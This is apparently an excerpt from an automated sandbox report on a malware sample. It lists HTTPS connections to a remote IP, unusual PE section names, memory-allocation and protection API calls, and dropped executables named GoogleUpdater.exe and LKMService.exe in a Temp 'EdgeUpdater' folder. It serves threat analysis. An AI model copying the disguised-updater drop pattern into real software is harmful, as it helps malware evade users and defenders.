Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52940
Source: unknown	Network traffic detected: HTTP traffic on port 52936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52980 -> 443

Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:52933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:52954 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name: ."Rv
Source: LKMService.exe.0.dr	Static PE information: section name: ."Rv
Source: GoogleUpdater.exe.2.dr	Static PE information: section name: ."Rv

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF5D50 NtProtectVirtualMemory,	0_2_04DF5D50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF6230 NtAllocateVirtualMemory,	0_2_04DF6230
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF61F8 NtAllocateVirtualMemory,	0_2_04DF61F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF5D49 NtProtectVirtualMemory,	0_2_04DF5D49
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B5D50 NtProtectVirtualMemory,	2_2_049B5D50
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B6230 NtAllocateVirtualMemory,	2_2_049B6230
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B5D49 NtProtectVirtualMemory,	2_2_049B5D49
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E5D50 NtProtectVirtualMemory,	3_2_050E5D50
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E6230 NtAllocateVirtualMemory,	3_2_050E6230
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E5D49 NtProtectVirtualMemory,	3_2_050E5D49
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05255D50 NtProtectVirtualMemory,	4_2_05255D50
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05256230 NtAllocateVirtualMemory,	4_2_05256230
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05255D49 NtProtectVirtualMemory,	4_2_05255D49
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_052561F2 NtAllocateVirtualMemory,	4_2_052561F2
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05205D50 NtProtectVirtualMemory,	11_2_05205D50
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05206230 NtAllocateVirtualMemory,	11_2_05206230
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05205D49 NtProtectVirtualMemory,	11_2_05205D49
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05206213 NtAllocateVirtualMemory,	11_2_05206213
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04885D50 NtProtectVirtualMemory,	15_2_04885D50
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04886230 NtAllocateVirtualMemory,	15_2_04886230
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04885D49 NtProtectVirtualMemory,	15_2_04885D49
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_0488620D NtAllocateVirtualMemory,	15_2_0488620D
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC5D50 NtProtectVirtualMemory,	18_2_04AC5D50
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC6230 NtAllocateVirtualMemory,	18_2_04AC6230
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC61F2 NtAllocateVirtualMemory,	18_2_04AC61F2
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC5D49 NtProtectVirtualMemory,	18_2_04AC5D49

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE1098	0_2_00FE1098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE9028	0_2_00FE9028
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEC1B8	0_2_00FEC1B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE9198	0_2_00FE9198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE9A30	0_2_00FE9A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEDE07	0_2_00FEDE07
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEA604	0_2_00FEA604
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEB7B8	0_2_00FEB7B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEA0A8	0_2_00FEA0A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE9019	0_2_00FE9019
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEC1A9	0_2_00FEC1A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE9187	0_2_00FE9187
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE0AB9	0_2_00FE0AB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEA280	0_2_00FEA280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEA270	0_2_00FEA270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEBE99	0_2_00FEBE99
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEDFC7	0_2_00FEDFC7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE8FB0	0_2_00FE8FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF0040	0_2_04DF0040
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF2DF0	0_2_04DF2DF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF76B0	0_2_04DF76B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF0007	0_2_04DF0007
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF6DC8	0_2_04DF6DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF55C8	0_2_04DF55C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF39EF	0_2_04DF39EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF2DEC	0_2_04DF2DEC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF858F	0_2_04DF858F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF85A0	0_2_04DF85A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF4538	0_2_04DF4538
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF3290	0_2_04DF3290
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF4E40	0_2_04DF4E40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF3A00	0_2_04DF3A00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF5200	0_2_04DF5200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF2BB8	0_2_04DF2BB8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF3758	0_2_04DF3758
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF4750	0_2_04DF4750
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF3748	0_2_04DF3748
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF8B70	0_2_04DF8B70
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009E1098	2_2_009E1098
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009E9028	2_2_009E9028
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009E9198	2_2_009E9198
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009EC1B8	2_2_009EC1B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009E9A30	2_2_009E9A30
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009EC3D8	2_2_009EC3D8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009EB7B8	2_2_009EB7B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009E108A	2_2_009E108A
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009EA0A8	2_2_009EA0A8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009EA0A0	2_2_009EA0A0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009E9187	2_2_009E9187
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009EC1A9	2_2_009EC1A9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009EA280	2_2_009EA280
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009E0A81	2_2_009E0A81
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009EBE99	2_2_009EBE99
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009EDE07	2_2_009EDE07
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009E7FA7	2_2_009E7FA7
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_009EDFC7	2_2_009EDFC7
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B2DF0	2_2_049B2DF0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B76B0	2_2_049B76B0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049BEE50	2_2_049BEE50
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B0040	2_2_049B0040
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049BBCF5	2_2_049BBCF5
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B85A0	2_2_049B85A0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B55C8	2_2_049B55C8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B6DC8	2_2_049B6DC8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B2DE2	2_2_049B2DE2
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B4538	2_2_049B4538
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049BEE41	2_2_049BEE41
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B4E40	2_2_049B4E40
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B3758	2_2_049B3758
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B4750	2_2_049B4750
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B3748	2_2_049B3748
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B39EF	2_2_049B39EF
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B3290	2_2_049B3290
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B3A00	2_2_049B3A00
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B5200	2_2_049B5200
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B2BB8	2_2_049B2BB8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B2BA9	2_2_049B2BA9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B8B70	2_2_049B8B70
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_0120C1B8	3_2_0120C1B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_01209028	3_2_01209028
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_01201098	3_2_01201098
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_01209AC5	3_2_01209AC5
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_0120C480	3_2_0120C480
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_0120B7B8	3_2_0120B7B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_01209187	3_2_01209187
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_0120A0A8	3_2_0120A0A8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_0120A280	3_2_0120A280
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_0120DFC7	3_2_0120DFC7
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_0120DE07	3_2_0120DE07
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E2DF0	3_2_050E2DF0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E0040	3_2_050E0040
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E76B0	3_2_050E76B0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E453D	3_2_050E453D
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E85A0	3_2_050E85A0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E6DC8	3_2_050E6DC8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E55DD	3_2_050E55DD
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E39EF	3_2_050E39EF
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E2DEC	3_2_050E2DEC
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E3748	3_2_050E3748
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E3758	3_2_050E3758
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E4765	3_2_050E4765
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E8B70	3_2_050E8B70
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E2BBD	3_2_050E2BBD
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E2BB8	3_2_050E2BB8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E3A00	3_2_050E3A00
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E3290	3_2_050E3290
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E4EC5	3_2_050E4EC5
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BB9A30	4_2_02BB9A30
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBC3D8	4_2_02BBC3D8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BB1098	4_2_02BB1098
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BB9028	4_2_02BB9028
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBC1B8	4_2_02BBC1B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BB9198	4_2_02BB9198
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBB7B8	4_2_02BBB7B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBA4A8	4_2_02BBA4A8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBA280	4_2_02BBA280
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBA270	4_2_02BBA270
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBA0A8	4_2_02BBA0A8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BB108A	4_2_02BB108A
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BB9018	4_2_02BB9018
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBC1A9	4_2_02BBC1A9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BB9187	4_2_02BB9187
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBBE99	4_2_02BBBE99
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBDE07	4_2_02BBDE07
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_02BBDFC7	4_2_02BBDFC7
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05252DF0	4_2_05252DF0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05250040	4_2_05250040
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_052576B0	4_2_052576B0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05254529	4_2_05254529
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_052585A0	4_2_052585A0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_0525858F	4_2_0525858F
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05252DE2	4_2_05252DE2
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_052539EF	4_2_052539EF
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05256DC8	4_2_05256DC8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_052555C8	4_2_052555C8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05250006	4_2_05250006
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05258B70	4_2_05258B70
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05253748	4_2_05253748
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05254750	4_2_05254750
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05253758	4_2_05253758
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05252BB8	4_2_05252BB8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05253A00	4_2_05253A00
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05254E40	4_2_05254E40
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05253290	4_2_05253290
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0120C1B8	11_2_0120C1B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_01209198	11_2_01209198
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_01209028	11_2_01209028
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_01201098	11_2_01201098
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0120C3D8	11_2_0120C3D8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_01209A30	11_2_01209A30
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0120B7B8	11_2_0120B7B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0120C1A9	11_2_0120C1A9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_01209187	11_2_01209187
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0120A069	11_2_0120A069
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0120A0A8	11_2_0120A0A8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_01201093	11_2_01201093
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0120A280	11_2_0120A280
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0120DFC7	11_2_0120DFC7
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0120DE07	11_2_0120DE07
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0120BE99	11_2_0120BE99
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05202DF0	11_2_05202DF0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05200040	11_2_05200040
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_052076B0	11_2_052076B0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05204529	11_2_05204529
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_052085A0	11_2_052085A0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05202DEC	11_2_05202DEC
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_052039EF	11_2_052039EF
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05206DC8	11_2_05206DC8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_052055C8	11_2_052055C8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05208B70	11_2_05208B70
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05203748	11_2_05203748
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05204750	11_2_05204750
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05203758	11_2_05203758
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05202BA9	11_2_05202BA9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05202BB8	11_2_05202BB8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05203A00	11_2_05203A00
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05204E40	11_2_05204E40
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05203290	11_2_05203290
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_00689028	15_2_00689028
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_00681098	15_2_00681098
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_0068C1B8	15_2_0068C1B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_00689A30	15_2_00689A30
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_0068C480	15_2_0068C480
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_0068B7B8	15_2_0068B7B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_0068A0A8	15_2_0068A0A8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_0068A280	15_2_0068A280
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_0068DE07	15_2_0068DE07
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_0068BE99	15_2_0068BE99
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_0068DFC7	15_2_0068DFC7
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04880040	15_2_04880040
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04882DF0	15_2_04882DF0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_048876B0	15_2_048876B0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_048885A0	15_2_048885A0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04886DC8	15_2_04886DC8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_048855C8	15_2_048855C8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_048839EF	15_2_048839EF
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04882DE4	15_2_04882DE4
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04884538	15_2_04884538
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04883290	15_2_04883290
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04883A00	15_2_04883A00
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04884E40	15_2_04884E40
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04882BB8	15_2_04882BB8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04883748	15_2_04883748
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04883758	15_2_04883758
